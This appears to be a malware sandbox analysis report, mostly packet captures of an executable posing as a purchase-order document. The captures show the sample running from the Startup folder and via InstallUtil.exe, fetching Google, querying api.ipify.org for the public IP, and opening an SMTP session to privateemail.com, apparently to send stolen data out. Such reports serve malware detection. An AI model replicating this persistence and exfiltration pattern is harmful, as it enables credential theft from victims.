68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 Data Ascii: 51e6<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google h
Jul 2, 2024 16:39:08.915832996 CEST	224	IN	Data Raw: 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 Data Ascii: as many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/b
Jul 2, 2024 16:39:08.915843964 CEST	1236	IN	Data Raw: 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c Data Ascii: randing/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="dqUEiSDq4vXorRxG-n2yVQ">(function(){var _g={kEI:'DBGEZpyFL4Dpi-gPmYeKsAc',kEXPI:'0,3700278,660,443,6,448526,93004,2891,3926,4422,3406,676
Jul 2, 2024 16:39:08.915935040 CEST	1236	IN	Data Raw: 34 2c 33 36 2c 32 33 39 2c 33 2c 31 39 35 2c 38 36 36 2c 31 32 36 2c 31 2c 36 2c 36 37 35 2c 31 35 37 32 2c 33 36 39 2c 33 2c 39 34 2c 31 36 38 34 2c 32 32 2c 31 31 31 2c 31 36 38 2c 31 2c 33 2c 31 30 2c 33 30 36 2c 32 32 32 2c 36 35 2c 34 34 39 Data Ascii: 4,36,239,3,195,866,126,1,6,675,1572,369,3,94,1684,22,111,168,1,3,10,306,222,65,449,51,9,1,3,1,1117,162,2,2880,294,916,609,1,6,197,92,554,1274,9,1033,12,652,504,1,3,107,513,124,539,4,258,690,418,366,455,1472,203,14,5,891,545,33,57,460,12,89,181
Jul 2, 2024 16:39:08.915946960 CEST	448	IN	Data Raw: 31 26 26 28 64 3d 71 28 64 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 64 29 29 3b 64 3d 22 22 3b 76 61 72 20 67 3d 62 2e 73 65 61 72 63 68 28 22 26 63 73 68 69 64 3d 22 29 3d 3d 3d 2d 31 26 26 61 21 3d 3d 22 73 6c 68 22 2c 66 3d 5b 5d 3b 66 Data Ascii: 1&&(d=q(d))&&(e+="&lei="+d));d="";var g=b.search("&cshid=")===-1&&a!=="slh",f=[];f.push(["zx",Date.now().toString()]);h._cshid&&g&&f.push(["cshid",h._cshid]);c=c();c!=null&&f.push(["opi",c.toString()]);for(c=0;c<f.length;c++){if(c===0\|\|c>0)d+=
Jul 2, 2024 16:39:08.916136980 CEST	1236	IN	Data Raw: 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 65 3b 63 7c 7c 28 63 3d 74 28 61 2c 62 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 Data Ascii: =e===void 0?l:e;c\|\|(c=t(a,b,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={
Jul 2, 2024 16:39:08.916150093 CEST	1236	IN	Data Raw: 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 Data Ascii: le>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999
Jul 2, 2024 16:39:08.916162014 CEST	1236	IN	Data Raw: 6c 65 66 74 3a 30 7d 23 67 62 67 20 2e 67 62 6d 7b 72 69 67 68 74 3a 30 7d 2e 67 62 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c Data Ascii: left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1
Jul 2, 2024 16:39:08.916172028 CEST	104	IN	Data Raw: 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a Data Ascii: t:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0
Jul 2, 2024 16:39:08.916184902 CEST	1236	IN	Data Raw: 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 7a 74 20 2e 67 62 74 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 Data Ascii: 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-
Jul 2, 2024 16:39:08.920730114 CEST	1236	IN	Data Raw: 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 67 62 74 6f 20 23 67 62 69 34 69 2c 2e 67 Data Ascii: left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49728	142.250.74.196	80	4052	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 16:40:33.704265118 CEST	64	OUT	GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Jul 2, 2024 16:40:34.369432926 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 14:40:34 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bQzZj1hadTG5Rgzd41-9bA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AQTF6Hw9ehy12uwM6qX4a5wxgK566fZHrHP85xyxvO9-F8hadKdJn99T_Bc; expires=Sun, 29-Dec-2024 14:40:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=515=HjhASgDkT4QgW7d_zBBQMBPgzpvrc709TZVmPgD6Ai8hqV8yYEuFZm_TwEu0H-1JPs7vChXwdtmkLEq-W-nDgmcma_IOaWtjd_k0qCCVDgi28XPp-e0MPXqHALLhhaPIPY6Vnj6jDjLybdPT6CGdxwfTx9SQiVM0gKO1Qe3gJQg; expires=Wed, 01-Jan-2025 14:40:34 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 34 39 33 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 Data Ascii: 4932<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
Jul 2, 2024 16:40:34.369458914 CEST	224	IN	Data Raw: 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/
Jul 2, 2024 16:40:34.369469881 CEST	1236	IN	Data Raw: 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 Data Ascii: branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="bQzZj1hadTG5Rgzd41-9bA">(function(){var _g={kEI:'YhGEZtK7Dof0i-gP4a-5mAw',kEXPI:'0,793110,2907215,624,432,6,448526,90132,2872,2891,3926,
Jul 2, 2024 16:40:34.369523048 CEST	1236	IN	Data Raw: 2c 32 34 2c 31 30 37 2c 31 37 38 2c 31 2c 33 2c 34 2c 33 30 36 2c 32 32 32 2c 36 36 2c 34 34 38 2c 35 31 2c 39 2c 31 2c 33 2c 31 2c 31 31 31 37 2c 31 36 32 2c 32 2c 32 36 33 36 2c 39 33 2c 31 34 36 2c 35 2c 32 32 34 2c 34 38 2c 31 38 2c 31 38 32 Data Ascii: ,24,107,178,1,3,4,306,222,66,448,51,9,1,3,1,1117,162,2,2636,93,146,5,224,48,18,1825,555,1283,343,2,687,664,504,1,3,620,124,801,689,420,111,249,1542,389,1693,60,433,63,12,117,113,388,752,989,212,39,718,5,207,450,5,947,380,841,866,15,436,17,1,10
Jul 2, 2024 16:40:34.369535923 CEST	1236	IN	Data Raw: 22 2c 66 3d 5b 5d 3b 66 2e 70 75 73 68 28 5b 22 7a 78 22 2c 44 61 74 65 2e 6e 6f 77 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 68 2e 5f 63 73 68 69 64 26 26 67 26 26 66 2e 70 75 73 68 28 5b 22 63 73 68 69 64 22 2c 68 2e 5f 63 73 68 69 64 5d Data Ascii: ",f=[];f.push(["zx",Date.now().toString()]);h._cshid&&g&&f.push(["cshid",h._cshid]);c=c();c!=null&&f.push(["opi",c.toString()]);for(c=0;c<f.length;c++){if(c===0\|\|c>0)d+="&";d+=f[c][0]+"="+f[c][1]}return"/"+(k\|\|"gen_204")+"?atyp=i&ct="+String(a
Jul 2, 2024 16:40:34.369548082 CEST	1236	IN	Data Raw: 66 61 6c 73 65 22 29 3b 61 3d 63 3d 3d 3d 22 31 22 7c 7c 63 3d 3d 3d 22 71 22 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 Data Ascii: false");a=c==="1"\|\|c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentEl
Jul 2, 2024 16:40:34.369560003 CEST	1236	IN	Data Raw: 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 Data Ascii: 0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px
Jul 2, 2024 16:40:34.369735003 CEST	552	IN	Data Raw: 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 Data Ascii: n:relative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0
Jul 2, 2024 16:40:34.369792938 CEST	1236	IN	Data Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 6f 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 62 65 62 65 62 65 3b 63 6f 6c 6f 72 3a 23 33 36 63 3b 70 61 64 64 Data Ascii: lay:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{dis
Jul 2, 2024 16:40:34.369805098 CEST	1236	IN	Data Raw: 67 62 69 34 69 2c 2e 67 62 74 6f 20 23 67 62 69 34 69 64 7b 74 6f 70 3a 33 70 78 7d 2e 67 62 69 34 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 34 70 78 7d 23 67 62 69 34 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 Data Ascii: gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-heigh
Jul 2, 2024 16:40:34.374361992 CEST	1236	IN	Data Raw: 6d 6c 31 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e Data Ascii: ml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49730	142.250.74.196	80	6524	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 16:41:00.376938105 CEST	64	OUT	GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Jul 2, 2024 16:41:01.047502995 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 14:41:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yaxcQORuYQE2epNQqeDOMQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AQTF6HysJo-Q9FwgFG0jZKBNZU_PsfwCYL4o8tgCSBOZ1p403l546AyxWg; expires=Sun, 29-Dec-2024 14:41:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=515=lbF11uzvNE1Sv07NxmA3n5VyHMyait4sNOEyUnEXxTnakIw-dRWBNexuPXth8usWZjpb3bBWr2CeGk4gaWS0QYuhfSW5cmHCbiau2pITI2nwuvGTUkbDNUiNu_WvzcTbpaQ_BGcelCU9Gup2J18iRCafkMWwQcugK3aFvi_ZFlw; expires=Wed, 01-Jan-2025 14:41:00 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 34 37 33 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 Data Ascii: 4737<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google h
Jul 2, 2024 16:41:01.047563076 CEST	1236	IN	Data Raw: 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 Data Ascii: as many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/
Jul 2, 2024 16:41:01.047601938 CEST	1236	IN	Data Raw: 35 2c 32 38 36 35 2c 36 38 32 2c 34 35 32 2c 32 30 37 2c 31 39 2c 35 36 35 37 2c 35 31 30 2c 31 36 36 32 2c 38 33 32 2c 35 33 39 2c 32 2c 33 2c 31 35 32 39 2c 33 32 34 2c 39 39 34 2c 34 38 37 2c 39 2c 31 2c 37 36 36 2c 33 37 34 2c 33 33 38 2c 31 Data Ascii: 5,2865,682,452,207,19,5657,510,1662,832,539,2,3,1529,324,994,487,9,1,766,374,338,1,4,2,1148,433,278,7,12,622,117,4,1339,1125,1,6,187,596,3,1,834,437,715,197,2134,4,245,294,831,707,1145,89,434,37,437,30,141,695,126,1,6,262,413,1572,369,3,94,448
Jul 2, 2024 16:41:01.047683001 CEST	672	IN	Data Raw: 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 22 68 74 74 70 73 3a 22 26 26 28 67 6f 6f 67 6c 65 2e 6d 6c 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 61 22 29 2c 21 31 2c 7b 73 72 63 3a 61 2c 67 Data Ascii: &window.location.protocol==="https:"&&(google.ml&&google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a}function t(a,b,c,d,k){var e="";b.search("&ei=")===-1&&(e="&ei="+p(d),b.search("&lei=")===-1&&(d=q(d))&&(e+="&lei="+d));d="";var g=b.searc
Jul 2, 2024 16:41:01.047719955 CEST	1236	IN	Data Raw: 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d Data Ascii: e,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];google.x=func
Jul 2, 2024 16:41:01.047754049 CEST	1236	IN	Data Raw: 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 Data Ascii: sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index
Jul 2, 2024 16:41:01.047792912 CEST	1236	IN	Data Raw: 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a Data Ascii: xms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);opacity:1;top:-2px;left:-5px;right
Jul 2, 2024 16:41:01.047828913 CEST	1236	IN	Data Raw: 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 Data Ascii: er-right:1px solid transparent;display:block;display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:
Jul 2, 2024 16:41:01.047862053 CEST	704	IN	Data Raw: 67 62 74 6f 20 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 35 70 78 20 31 70 78 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 31 70 78 7d 23 67 62 69 34 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 Data Ascii: gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px
Jul 2, 2024 16:41:01.047897100 CEST	1236	IN	Data Raw: 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 77 69 64 74 Data Ascii: 8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-6px -22px}.gbn .gbmt,.gbn .gbmt:visited,.gbnd .gbmt,.gbnd .gbmt:visited{color:#dd8e27 !important}.gbf .gbmt,.gbf .gbmt:vi
Jul 2, 2024 16:41:01.052807093 CEST	1236	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 Data Ascii: ound-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,0,.12);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.12);box-shadow:0 2px 4px rgba(

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49731	104.26.12.205	443	5928	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 14:41:44 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 2, 2024 16:41:55.216917992 CEST	587	49732	198.54.122.135	192.168.2.6	220 PrivateEmail.com prod Mail Node
Jul 2, 2024 16:41:55.217344999 CEST	49732	587	192.168.2.6	198.54.122.135	EHLO 088753
Jul 2, 2024 16:41:55.377623081 CEST	587	49732	198.54.122.135	192.168.2.6	250-mta-11.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-CHUNKING 250 STARTTLS
Jul 2, 2024 16:41:55.378021955 CEST	49732	587	192.168.2.6	198.54.122.135	STARTTLS
Jul 2, 2024 16:41:55.538207054 CEST	587	49732	198.54.122.135	192.168.2.6	220 Ready to start TLS

Target ID:	0
Start time:	10:39:06
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\Drawing specification and June PO #07329.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Drawing specification and June PO #07329.exe"
